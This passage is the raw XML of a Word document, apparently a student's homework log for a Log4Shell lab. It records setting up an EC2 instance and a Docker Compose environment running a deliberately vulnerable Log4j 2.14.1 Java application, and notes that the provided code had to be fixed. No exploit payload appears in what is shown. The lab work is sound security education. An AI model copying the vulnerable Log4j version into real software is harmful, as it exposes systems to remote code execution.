          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Entered the info and connected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBA00D" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="004A708D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test File Sync with Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FC43C" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploaded test file on </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/home/ec2-user/share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3CB8E7" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Used SSH to confirm it is there – confirmed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08732874" w14:textId="2A7D165D" w:rsidR="004A708D" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I am ready to follow instructions </w:t>
      </w:r>
      <w:r w:rsidR="002977F0" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">provided in the Assignment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A2159" w14:textId="1C767108" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0" w:rsidP="002977F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Set Up the Vulnerable Environment </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Task: Deploy a Java application with a vulnerable Log4j version (2.14.1)using Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7055AB" w14:textId="1A040958" w:rsidR="004A708D" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Created a folder on instance called log4shell-homework </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D327DEE" w14:textId="14564C52" w:rsidR="004A708D" w:rsidRPr="009F01AC" w:rsidRDefault="004A708D" w:rsidP="004A708D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DBAA614" wp14:editId="33907CEC">
            <wp:extent cx="3839450" cy="1610436"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="18481490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49058" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3843343" cy="1612069"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66E03D" w14:textId="57EAD1C5" w:rsidR="004A708D" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I created file structure: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A579A6" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log4shell-homework/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3897FD" w14:textId="38894F33" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>── pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> used code provided </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2BB814" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>└── src/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044191CA" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    └── main/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282A089" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>── java/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855A3C7" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        │   └── com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1878D460" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        │       └── example/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D801D" w14:textId="3DE27AC0" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        │           └── </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LogController.java </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> used code provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05488353" w14:textId="77777777" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        └── resources/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2AFC3" w14:textId="3316016A" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>── application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> did not do this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01BB87" w14:textId="5637DDC3" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="00613B2C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            └── log4j2.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optional </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702480F" w14:textId="6D8071A7" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00613B2C" w:rsidP="002977F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Build and run Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6B81B4" w14:textId="2711259C" w:rsidR="00613B2C" w:rsidRPr="009F01AC" w:rsidRDefault="00A6412E" w:rsidP="00A6412E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Created docker and docker compose files with code provided. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049030CA" w14:textId="77777777" w:rsidR="002977F0" w:rsidRPr="009F01AC" w:rsidRDefault="00A6412E" w:rsidP="002977F0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Built and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52737318" w14:textId="3170C66B" w:rsidR="00806B89" w:rsidRPr="009F01AC" w:rsidRDefault="00806B89" w:rsidP="002977F0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The codes provided did not work and I was unable to run docker or build it. The code</w:t>
      </w:r>
      <w:r w:rsidR="002977F0" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">did not copy paste properly, had to go back and recreate the files. Had to fix the code and then paste to finally get it moving forward. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC9CBDB" w14:textId="0F32972D" w:rsidR="00806B89" w:rsidRPr="009F01AC" w:rsidRDefault="00806B89" w:rsidP="00806B89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
